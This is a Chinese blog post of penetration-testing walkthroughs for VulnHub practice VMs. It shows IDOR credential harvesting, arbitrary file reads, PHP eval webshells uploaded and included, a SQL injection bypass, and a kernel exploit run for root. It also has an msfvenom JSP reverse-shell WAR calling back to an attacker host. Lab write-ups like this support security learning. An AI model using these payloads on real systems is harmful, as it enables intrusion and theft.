<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="开始学点更有意思的，从 VlunHub 开始刷刷吧。 所有靶场环境来源：https:&#x2F;&#x2F;www.vulnhub.com&#x2F; Me and My Girlfriend: 1记录一下踩到的坑吧，一开始一直找不到 IP 地址，后来尝试在自己的另外一台虚拟机里面 ifconfig 看看网段，再用 Nmap 找了一下。（要用 NAT 模式，改完之后要重启）  可以发现这两个 IP，上面的是👴的虚拟机的 IP">
<meta property="og:type" content="article">
<meta property="og:title" content="渗透学习入门-VulnHub自闭之旅">
<meta property="og:url" content="http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/index.html">
<meta property="og:site_name" content="Du1">
<meta property="og:description" content="开始学点更有意思的，从 VlunHub 开始刷刷吧。 所有靶场环境来源：https:&#x2F;&#x2F;www.vulnhub.com&#x2F; Me and My Girlfriend: 1记录一下踩到的坑吧，一开始一直找不到 IP 地址，后来尝试在自己的另外一台虚拟机里面 ifconfig 看看网段，再用 Nmap 找了一下。（要用 NAT 模式，改完之后要重启）  可以发现这两个 IP，上面的是👴的虚拟机的 IP">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.loli.net/2021/05/10/QfTMzclrhmnC6Od.png">
<meta property="og:image" content="https://i.loli.net/2021/05/10/SAcCMQ5KPG6L9hT.png">
<meta property="og:image" content="https://i.loli.net/2021/05/10/KXcNlg4eZusi8zU.png">
<meta property="og:image" content="https://i.loli.net/2021/05/10/vM635ZVh1cafJHU.png">
<meta property="og:image" content="https://i.loli.net/2021/05/10/oBW3p8i759FjUTX.png">
<meta property="og:image" content="https://i.loli.net/2021/05/10/LTVUujl9rsOqKHm.png">
<meta property="og:image" content="https://i.loli.net/2021/05/10/toaRemSF38Whsqk.png">
<meta property="og:image" content="https://i.loli.net/2021/05/11/JCRpyBb3YlXrcuz.png">
<meta property="og:image" content="https://i.loli.net/2021/05/11/GljBuzU34ZPCo9I.png">
<meta property="og:image" content="https://i.loli.net/2021/05/11/Ty48Kgz7LcniF3P.png">
<meta property="og:image" content="https://i.loli.net/2021/05/11/omna17ShKRxqwpQ.png">
<meta property="og:image" content="https://i.loli.net/2021/05/11/oPXG5jDAetKrfgC.png">
<meta property="og:image" content="https://i.loli.net/2021/05/11/mdCOWsfSDtXPM7F.png">
<meta property="og:image" content="https://i.loli.net/2021/05/11/GXZI1fwaWP4piFN.png">
<meta property="og:image" content="https://i.loli.net/2021/05/11/jTKaLHUbJDmrRh3.png">
<meta property="og:image" content="https://i.loli.net/2021/05/11/CszhpEtxGVRDdNH.png">
<meta property="og:image" content="https://i.loli.net/2021/05/13/rltALPbhEco47BK.png">
<meta property="og:image" content="https://i.loli.net/2021/05/13/dZcur9L3xApOGPj.jpg">
<meta property="og:image" content="https://i.loli.net/2021/05/13/LDtSI2FRCoq4XEH.png">
<meta property="og:image" content="https://i.loli.net/2021/05/13/QHYwarZ3W9FDOJm.png">
<meta property="og:image" content="https://i.loli.net/2021/05/13/rCIt6ZE58MqimnY.png">
<meta property="og:image" content="https://i.loli.net/2021/05/13/bZHUfsgpeAzFi47.png">
<meta property="og:image" content="https://i.loli.net/2021/05/13/iEvmcHzBZ6uaL1I.png">
<meta property="og:image" content="https://i.loli.net/2021/05/13/4Bw1tUfXdkmvNQ6.png">
<meta property="og:image" content="https://i.loli.net/2021/05/13/7PcaTGvr3MXZBwm.png">
<meta property="og:image" content="https://i.loli.net/2021/05/13/FvfjmRVUbPzk5WX.png">
<meta property="og:image" content="https://i.loli.net/2021/05/13/WTVzvbgFcrksuU2.png">
<meta property="og:image" content="https://i.loli.net/2021/05/14/x4BjoNLF6eKCp1v.png">
<meta property="og:image" content="https://i.loli.net/2021/05/14/XfprCJUjvYn7TIK.png">
<meta property="og:image" content="https://i.loli.net/2021/05/14/HuPBYdxZX9LylKs.png">
<meta property="og:image" content="https://i.loli.net/2021/05/14/IFRLAYWqaoGtS8v.png">
<meta property="og:image" content="https://i.loli.net/2021/05/14/vHzlJdCqMFou97O.jpg">
<meta property="article:published_time" content="2021-05-10T14:20:36.000Z">
<meta property="article:modified_time" content="2021-05-14T02:11:21.672Z">
<meta property="article:author" content="Du1">
<meta property="article:tag" content="渗透">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/05/10/QfTMzclrhmnC6Od.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>渗透学习入门-VulnHub自闭之旅</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<!--
<link rel="stylesheet" href="//cdn.bootcss.com/highlight.js/9.2.0/styles/github.min.css">
<script src="//cdn.bootcss.com/highlight.js/9.2.0/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
-->
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" "Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/links/">links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/duitutu">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post " href="/2021/05/11/%F0%9F%91%B4%E7%9A%84%E5%85%BB%E9%A9%AC%E5%9C%BA/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post " href="/2021/05/09/2021-Red-Hat-and-WICCTF-WP/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top " href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post " href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&text=渗透学习入门-VulnHub自闭之旅"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&title=渗透学习入门-VulnHub自闭之旅"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&is_video=false&description=渗透学习入门-VulnHub自闭之旅"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=渗透学习入门-VulnHub自闭之旅&body=Check out this article: http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&title=渗透学习入门-VulnHub自闭之旅"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&title=渗透学习入门-VulnHub自闭之旅"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&title=渗透学习入门-VulnHub自闭之旅"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&title=渗透学习入门-VulnHub自闭之旅"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&name=渗透学习入门-VulnHub自闭之旅&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&t=渗透学习入门-VulnHub自闭之旅"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Me-and-My-Girlfriend-1"><span class="toc-number">1.</span> <span class="toc-text">Me and My Girlfriend: 1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Billu-b0x"><span class="toc-number">2.</span> <span class="toc-text">Billu_b0x</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Breach1-0"><span class="toc-number">3.</span> <span class="toc-text">Breach1.0</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Five86-1"><span class="toc-number">4.</span> <span class="toc-text">Five86-1</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        渗透学习入门-VulnHub自闭之旅
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Du1</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-05-10T14:20:36.000Z" itemprop="datePublished">2021-05-10</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/%E6%B8%97%E9%80%8F/" rel="tag">渗透</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>开始学点更有意思的，从 VlunHub 开始刷刷吧。</p>
<p>所有靶场环境来源：<a target="_blank" rel="noopener" href="https://www.vulnhub.com/">https://www.vulnhub.com/</a></p>
<h2 id="Me-and-My-Girlfriend-1"><a href="#Me-and-My-Girlfriend-1" class="headerlink" title="Me and My Girlfriend: 1"></a>Me and My Girlfriend: 1</h2><p>记录一下踩到的坑吧，一开始一直找不到 IP 地址，后来尝试在自己的另外一台虚拟机里面 ifconfig 看看网段，再用 Nmap 找了一下。（要用 NAT 模式，改完之后要重启）</p>
<p><img src="https://i.loli.net/2021/05/10/QfTMzclrhmnC6Od.png"></p>
<p>可以发现这两个 IP，上面的是👴的虚拟机的 IP，那么下面那个就是靶机的 IP 了，而且可以发现只有它开启了 http 与 ssh 服务：</p>
<p><img src="https://i.loli.net/2021/05/10/SAcCMQ5KPG6L9hT.png"></p>
<p>进入页面，页面回显：<code>Who are you? Hacker? Sorry This Site Can Only Be Accessed local!</code></p>
<p>XFF 改一下 127.0.0.1 进入。发现存在 login 与 register，先随便注册一个账号，发现 id 从 12 开始：</p>
<p><img src="https://i.loli.net/2021/05/10/KXcNlg4eZusi8zU.png"></p>
<p>尝试修改 id，发现存在越权漏洞：（可以推测后台代码为：<code>selct * from user where id = intval($_GET[&#39;id&#39;]);</code></p>
<p><img src="https://i.loli.net/2021/05/10/vM635ZVh1cafJHU.png" alt="SL~LFWIE20__5MHIR6O4U_7.png"></p>
<p>可以爆破一下前 11 个 id 得到用户名和密码表：</p>
<p><img src="https://i.loli.net/2021/05/10/oBW3p8i759FjUTX.png"></p>
<table>
<thead>
<tr>
<th>id</th>
<th>用户名</th>
<th>密码</th>
</tr>
</thead>
<tbody><tr>
<td>1</td>
<td>eweuhtandingan</td>
<td>skuyatuh</td>
</tr>
<tr>
<td>2</td>
<td>aingmaung</td>
<td>qwerty!!!</td>
</tr>
<tr>
<td>3</td>
<td>sundatea</td>
<td>indONEsia</td>
</tr>
<tr>
<td>4</td>
<td>sedihaingmah</td>
<td>cedihhihihi</td>
</tr>
<tr>
<td>5</td>
<td>alice</td>
<td>4lic3</td>
</tr>
<tr>
<td>9</td>
<td>abdikasepak</td>
<td>dorrrrr</td>
</tr>
<tr>
<td>12</td>
<td>Du1</td>
<td>Du1</td>
</tr>
</tbody></table>
<p>ssh 连接，每个账号都试一遍，最后发现 alice 成功登上：（其实在题目描述里面也提到了 Alice，也算是一个暗示吧）</p>
<p><img src="https://i.loli.net/2021/05/10/LTVUujl9rsOqKHm.png"></p>
<p>先到处看看，获取到 flag1，继续往下看。</p>
<p><img src="https://i.loli.net/2021/05/10/toaRemSF38Whsqk.png"></p>
<p>发现 <code>/var/www/html/config/config.php</code> 中的这一句：<code>$conn = mysqli_connect(&#39;localhost&#39;, &#39;root&#39;, &#39;ctf_pasti_bisa&#39;, &#39;ceban_corp&#39;)</code>。好家伙，数据库是 root 用户，直接 <code>su root</code> 登一波，发现 flag2</p>
<p><img src="https://i.loli.net/2021/05/11/JCRpyBb3YlXrcuz.png"></p>
<h2 id="Billu-b0x"><a href="#Billu-b0x" class="headerlink" title="Billu_b0x"></a>Billu_b0x</h2><p>Nmap 扫描一下端口及服务：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">22&#x2F;tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">80&#x2F;tcp open  http    Apache httpd 2.2.22 ((Ubuntu))</span><br></pre></td></tr></table></figure>

<p>访问一下 http 服务，发现是一个登陆页面，提示说 “Show me your SQLI skills”，应该是要 sql 注入。</p>
<p>扫一下，得到一些页面：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">[07:43:17] 200 -  307B  - &#x2F;add</span><br><span class="line">[07:43:19] 200 -    1B  - &#x2F;c</span><br><span class="line">[07:43:21] 200 -    1KB - &#x2F;images&#x2F;</span><br><span class="line">[07:43:21] 200 -    3KB - &#x2F;index</span><br><span class="line">[07:43:21] 200 -    3KB - &#x2F;index.php</span><br><span class="line">[07:43:21] 200 -   47KB - &#x2F;in</span><br><span class="line">[07:43:22] 302 -    2KB - &#x2F;panel  -&gt;  index.php</span><br><span class="line">[07:43:22] 302 -    2KB - &#x2F;panel.php  -&gt;  index.php</span><br><span class="line">[07:43:23] 200 -    8KB - &#x2F;phpmy&#x2F;</span><br><span class="line">[07:43:23] 200 -    1B  - &#x2F;show</span><br><span class="line">[07:43:24] 200 -   72B  - &#x2F;test</span><br><span class="line">[07:43:24] 200 -   72B  - &#x2F;test.php</span><br></pre></td></tr></table></figure>

<p>在 test.php 发现任意文件下载：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;POST http:&#x2F;&#x2F;192.168.237.134&#x2F;test.php</span><br><span class="line">file&#x3D;&#x2F;etc&#x2F;passwd</span><br></pre></td></tr></table></figure>

<p>可以把所有页面的源码下载下来：</p>
<ul>
<li>add.php 是一个无法使用功能的上传页面</li>
<li>in.php 里是 phpinfo，没有有用信息</li>
<li>c.php 是数据库连接文件，发现 <code>$conn = mysqli_connect(&quot;127.0.0.1&quot;,&quot;billu&quot;,&quot;b0x_billu&quot;,&quot;ica_lab&quot;);</code>，从而知道数据库连接的用户名密码</li>
<li>/etc/passwd 中有一个 id 为 1000 的用户，名为 ica</li>
</ul>
<p>访问 phpmy，用我们获得的数据库密码去登录访问。</p>
<p><img src="https://i.loli.net/2021/05/11/GljBuzU34ZPCo9I.png"></p>
<p>获取到 index.php 中登陆的用户名与密码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">biLLu</span><br><span class="line">hEx_it</span><br></pre></td></tr></table></figure>

<p>进入。</p>
<p><img src="https://i.loli.net/2021/05/11/Ty48Kgz7LcniF3P.png"></p>
<p>panel.php 中存在任意文件包含：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;continue&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$choice</span>===<span class="string">&#x27;add&#x27;</span>) &#123;&#125;</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$choice</span>===<span class="string">&#x27;show&#x27;</span>) &#123;&#125;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">include</span>(<span class="variable">$dir</span>.<span class="string">&#x27;/&#x27;</span>.<span class="variable">$_POST</span>[<span class="string">&#x27;load&#x27;</span>]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>再看一下 upload 的上传逻辑吧：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$r</span>=pathinfo(<span class="variable">$_FILES</span>[<span class="string">&#x27;image&#x27;</span>][<span class="string">&#x27;name&#x27;</span>],PATHINFO_EXTENSION);</span><br><span class="line"><span class="variable">$image</span>=<span class="keyword">array</span>(<span class="string">&#x27;jpeg&#x27;</span>,<span class="string">&#x27;jpg&#x27;</span>,<span class="string">&#x27;gif&#x27;</span>,<span class="string">&#x27;png&#x27;</span>);</span><br><span class="line"><span class="keyword">if</span> (in_array(<span class="variable">$r</span>,<span class="variable">$image</span>)) &#123;&#125;</span><br></pre></td></tr></table></figure>

<p>那就直接写个 <code>&lt;?php @eval($_POST[&quot;Du1&quot;]);phpinfo(); ?&gt;</code> 的🐎，后缀改下 png，传上去包含一下就 ok 了：</p>
<p><img src="https://i.loli.net/2021/05/11/omna17ShKRxqwpQ.png"></p>
<p>反弹一下 shell，然后怎么都反弹不回，很烦，所以直接写个🐎到 upload_images 里面：<code>echo%20&#39;&lt;?php%20eval($_POST[&quot;Du1&quot;]);?&gt;&#39;%20&gt;%20uploaded_images/1.php</code>，蚁剑连上：（uploaded_images 有写权限）</p>
<p><img src="https://i.loli.net/2021/05/11/oPXG5jDAetKrfgC.png"></p>
<p><code>uname -a</code> 与 <code>cat /etc/issue</code> 查看内核及系统版本，寻找提权 exp：<a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/37292/">https://www.exploit-db.com/exploits/37292/</a></p>
<p>然后传上去：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">chmod 777 exp.c  # 赋予权限</span><br><span class="line">gcc exp.c -o exp  # 编译</span><br><span class="line">./exp  # 执行，提权至 root</span><br></pre></td></tr></table></figure>

<p>登录那里其实还有另一种解法：之前提到过 sql 注入，我们可以审计一下 index.php 源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$uname</span>=str_replace(<span class="string">&#x27;\&#x27;&#x27;</span>,<span class="string">&#x27;&#x27;</span>,urldecode(<span class="variable">$_POST</span>[<span class="string">&#x27;un&#x27;</span>]));</span><br><span class="line"><span class="variable">$pass</span>=str_replace(<span class="string">&#x27;\&#x27;&#x27;</span>,<span class="string">&#x27;&#x27;</span>,urldecode(<span class="variable">$_POST</span>[<span class="string">&#x27;ps&#x27;</span>]));</span><br><span class="line"><span class="variable">$run</span>=<span class="string">&#x27;select * from auth where  pass=\&#x27;&#x27;</span>.<span class="variable">$pass</span>.<span class="string">&#x27;\&#x27; and uname=\&#x27;&#x27;</span>.<span class="variable">$uname</span>.<span class="string">&#x27;\&#x27;&#x27;</span>;</span><br></pre></td></tr></table></figure>

<p>很简单的过滤，把单引号去掉，我们用 <code>\</code> 逃逸掉就 ok 了：<code>ps=\&amp;un=or 1=1 #</code>。</p>
<p>对于 root 的话，还有一个点，就是 phpmyadmin 的配置文件读取：<code>/var/www/phpmy/config.inc.php</code>：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$cfg</span>[<span class="string">&#x27;Servers&#x27;</span>][<span class="variable">$i</span>][<span class="string">&#x27;user&#x27;</span>] = <span class="string">&#x27;root&#x27;</span>;</span><br><span class="line"><span class="variable">$cfg</span>[<span class="string">&#x27;Servers&#x27;</span>][<span class="variable">$i</span>][<span class="string">&#x27;password&#x27;</span>] = <span class="string">&#x27;roottoor&#x27;</span>;</span><br></pre></td></tr></table></figure>

<p>直接拿到 root 密码。</p>
<hr>
<p>注：</p>
<ul>
<li>提权方法可以多关注主要的配置文件、数据库连接文件、用户的文件，也可以利用Ubuntu已知漏洞本地提权</li>
<li>MySQL 有可能被高线程目录暴破和注入宕机</li>
</ul>
<h2 id="Breach1-0"><a href="#Breach1-0" class="headerlink" title="Breach1.0"></a>Breach1.0</h2><p>注：</p>
<p>VM 虚机配置有静态IP地址（192.168.110.140），需要将虚拟机网卡设置为 host-only 方式组网。</p>
<p>具体方法：点开网络适配器，配置 vm net1 -&gt; 属性 -&gt; TCP/IPV4 -&gt; ip：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">192.168.110.1</span><br><span class="line">255.255.255.0</span><br><span class="line">192.168.110.254</span><br></pre></td></tr></table></figure>

<hr>
<p>Nmap 扫一下发现它把所有端口都开放了（可以用 -sF 绕过防探测策略）……我们直接访问 http。在 <a target="_blank" rel="noopener" href="http://192.168.110.140/impresscms/user.php">http://192.168.110.140/impresscms/user.php</a> 可以登录 cms。</p>
<p><img src="https://i.loli.net/2021/05/11/mdCOWsfSDtXPM7F.png"></p>
<p>在 index 注释中找到一段 Base64：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo</span><br><span class="line">cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh</span><br><span class="line">pgibbons:damnitfeel$goodtobeagang$ta</span><br></pre></td></tr></table></figure>

<p>获得用户名与密码，登录。</p>
<p>Inbox 中有三封邮件，在第三封邮件中发现 <a target="_blank" rel="noopener" href="http://192.168.110.140/.keystore">http://192.168.110.140/.keystore</a> 存在一个 SSL certificate。View Account 中的 Content 有一个 SSL implementation test capture，发现流量包 <a target="_blank" rel="noopener" href="http://192.168.110.140/impresscms/_SSL_test_phase1.pcap%EF%BC%8C%E5%90%8C%E6%97%B6%E8%8E%B7%E5%8F%96%E5%88%B0%E6%8F%90%E7%A4%BA%EF%BC%9A%60They">http://192.168.110.140/impresscms/_SSL_test_phase1.pcap，同时获取到提示：`They</a> told me the alias, storepassword and keypassword are all set to ‘tomcat’.`，提示了别名、存储密码和密钥密码都设置为 tomcat。</p>
<p>利用 JDK 的 keytool.exe 解密，首先查看 keystore 中的所有证书：</p>
<p><code> keytool -list -keystore ./keystore</code>：（密钥库口令 tomcat）</p>
<p><img src="https://i.loli.net/2021/05/11/GXZI1fwaWP4piFN.png"></p>
<p>从密钥库中导出 .p12 证书，将 keystore 拷贝到 keytool 目录，导出名为 tomcatkeystore.p12 的证书：</p>
<p><code>keytool -importkeystore -srckeystore ./keystore -destkeystore tomcatkeystore.p12 -deststoretype PKCS12 -srcalias tomcat</code></p>
<p><img src="https://i.loli.net/2021/05/11/jTKaLHUbJDmrRh3.png"></p>
<p>然后将 .p12 证书导入打开了流量包的 WireShark：编辑 -&gt; 首选项 -&gt; Protocols -&gt; TLS -&gt; EDIT（最新版 WireShark 已经把 SSL改为 TLS，其实 SSL/TLS 都已统称通信加密协议，所以就放一块了）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">192.168.110.140 8443 http 点击选择证书文件 输入密码tomcat</span><br></pre></td></tr></table></figure>

<p>因为 <em>8443 是 tomcat 打开 SSL 的文本服务的默认端口</em></p>
<p>至此成功解密流量，分析可以发现其中存在 jsp 木马的流量，以及采用 http basic 认证登录后台的流量，经过 Base64 解密后得到 tomcat 用户名及密码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tomcat:Tt\5D8F(#!*u&#x3D;G)4m7zB</span><br></pre></td></tr></table></figure>

<p>访问 <a target="_blank" rel="noopener" href="https://192.168.110.140:8443/_M@nag3Me/html%EF%BC%8C%E5%A6%82%E6%9E%9C%E7%99%BB%E5%BD%95%E4%B8%8D%E6%88%90%E5%8A%9F%E5%8F%AF%E4%BB%A5%E5%B0%9D%E8%AF%95">https://192.168.110.140:8443/_M@nag3Me/html，如果登录不成功可以尝试</a> BP 发包（因为最新版浏览器如果没有相应证书会有限制，但是 BP 中有各种证书，挂个 BP 代理就上了）</p>
<p><img src="https://i.loli.net/2021/05/11/CszhpEtxGVRDdNH.png"></p>
<p>可以上传包含 jsp 马的 war 包，利用 msf 直接生成：<code>msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.100 LPORT=2333 -f war &gt; shell.war</code>，在 msf 上设置一个监听，然后直接传马访问：（弹回来的 shell 要等巨 JB 久，👴是要放弃的时候突然发现，欸，怎么 connect 了）</p>
<p><img src="https://i.loli.net/2021/05/13/rltALPbhEco47BK.png"></p>
<p><img src="https://i.loli.net/2021/05/13/dZcur9L3xApOGPj.jpg" alt="~_G_QMR9_8RRP1MXL_V@N_3.jpg"></p>
<p>此时拿到了 shell 了，可以用 python 来获取交互式 shell：<code>python -c &#39;import pty;pty.spawn(&quot;/bin/bash&quot;)&#39; </code></p>
<p><img src="https://i.loli.net/2021/05/13/LDtSI2FRCoq4XEH.png"></p>
